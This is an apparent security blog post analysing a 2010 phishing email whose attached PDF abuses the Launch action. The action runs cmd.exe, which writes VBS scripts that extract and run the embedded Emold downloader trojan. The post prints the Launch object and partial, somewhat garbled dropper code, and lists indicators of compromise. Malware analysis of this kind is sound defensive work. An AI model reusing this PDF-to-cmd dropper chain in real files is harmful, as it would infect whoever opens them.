0 Results Found
              Back To Results

                Your Malware Settings May Have Changed

                By: Nick Chapman

                Last night and this morning, a number of people received an email that looks like this: 

                From: notifications@yyybank.com
                Sent: Tuesday, April 27, 2010 7:47 AM
                To: xxx@yyyybank.com
                Subject: setting for your mailbox are changed

                SMTP and POP3 servers for xxx@yyybank.com mailbox are changed. 
                Please carefully read the attached instructions before updating settings.

                The message contains a file called "doc.pdf". That file was, of course, malicious in nature. It used the PDF Launch vulnerability to echo commands into a batch file and then run the Emold downloader trojan. Let's take a look at the code.

                8 0 obj
                /Type /Action
                /S /Launch
                /F (cmd.exe)
                /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs && echo Set f=fso.OpenTextFile(?doc.pdf?, 1, True) >> script.vbs && echo pf=f.ReadAll >> script.vbs && echo s=InStr(pf,??SS?) >> script.vbs && echo e=InStr(pf,??EE?) >> script.vbs && echo s=Mid(pf,s,e-s) >> script.vbs && echo Set z=fso.OpenTextFile(?batscript.vbs?, 2, True) >> script.vbs && echo s = Replace(s,?%?,?") >> script.vbs && echo z.Write(s) >> script.vbs && script.vbs && batscript.vbs

                This code sample uses cmd.exe to write text to a file called script.vbs. The code then executes script.vbs and batscript.vbs. 
                Let's look at how script.vbs ends up:

                Set fso=CreateObject(?Scripting.FileSystemObject?)
                Set f=fso.OpenTextFile(?doc.pdf?, 1, True)
                echo pf=f.ReadAll
                echo s=InStr(pf,??SS?)
                echo e=InStr(pf,??EE?)
                Set z=fso.OpenTextFile(?batscript.vbs?, 2, True)
                s = Replace(s,?%?,?")

                When the code executes script.vbs, the VBS file opens doc.pdf and looks for the tags SS and EE to mark the beginning and end of a section of the pdf. It extracts that section, manipulates the text, and then writes the result to batscript.vbs. 

                Next, let's look what's in the tagged section of doc.pdf that ends up in batscript.vbs:

                5 0 obj
                << /Length 46 >>
                /F1 34 Tf
                50 500 Td
                (Important Information

                %Dim b
                %Function c(d)
                %End Function
                ?this line is 248413 characters long?
                ?c(000),c(000),c(000),c(000 ),?")
                %Set fso = CreateObject(?Scripting.FileSystemObject?)
                %Set f = fso.OpenTextFile(?game.exe?, 2, True)
                %For i = 0 To 35328
                %Set WshShell = WScript.CreateObject(?WScript.Shell?)
                %WshShell.Run ?cmd.exe /c game.exe?
                %WScript.Sleep 3000
                %Set f = FSO.GetFile(?game.exe?)
                %Set f = FSO.GetFile(?batscript.vbs?)
                %Set f = FSO.GetFile(?script.vbs?)

                The array stored in b is actually an obfuscated executable file that is stored in game.exe. After running game.exe, this script (executed in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, and script.vbs.

                Game.exe is the Emold trojan. Emold is a generic downloader that can be used to install any number of second stage trojans. It can be identified by the presence of the C:/Program Files/Microsoft Common/svchost.exe file, the software Microsoft Windows NTCurrent Version Image File Execution Optionsexplorer.exe registry key, and because it (currently) phones home to jademason.com.

                Adobe has stated that the Launch functionality is a feature, not a bug. Adobe is looking into the issue, but has not said what action, if any, it intends to take to mitigate the danger. Their post on this issue does include directions for turning off this functionality.

                Related Content